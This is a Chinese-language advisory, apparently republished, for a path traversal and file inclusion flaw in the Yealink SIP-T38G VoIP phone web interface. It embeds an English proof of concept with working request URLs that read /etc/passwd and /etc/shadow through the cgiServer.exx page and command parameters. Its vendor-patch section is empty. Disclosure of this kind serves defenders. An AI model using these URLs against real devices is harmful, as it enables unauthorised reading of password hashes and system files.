Yealink VoIP Phone SIP-T38G存在绝对路径遍历安全漏洞,cgi-bin/cgiServer.exx没有正确过滤用户输入,经过身份验证的远程攻击者通过"command"参数内dumpConfigFile函数的完整路径名,利用此漏洞可读取任意文件。
<*来源:Mr.Un1k0d3r
链接:http://osvdb.org/show/osvdb/108079 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Title: Yealink VoIP Phone SIP-T38G Local File Inclusion Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5756, CVE-2013-5757 Description: Web interface contain a vulnerability that allow any page to be included. We are able to disclose /etc/passwd & /etc/shadow POC: Using the page parameter (CVE-2013-5756): http:// [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http:// [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow Using the command parameter (CVE-2013-5757): http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow") *By viewing the shadow file we are able to conclude that cgiServer.exx run under the root privileges. This lead to CVE-2013-5759.建议: -------------------------------------------------------------------------------- 厂商补丁:
易网时代-编程资源站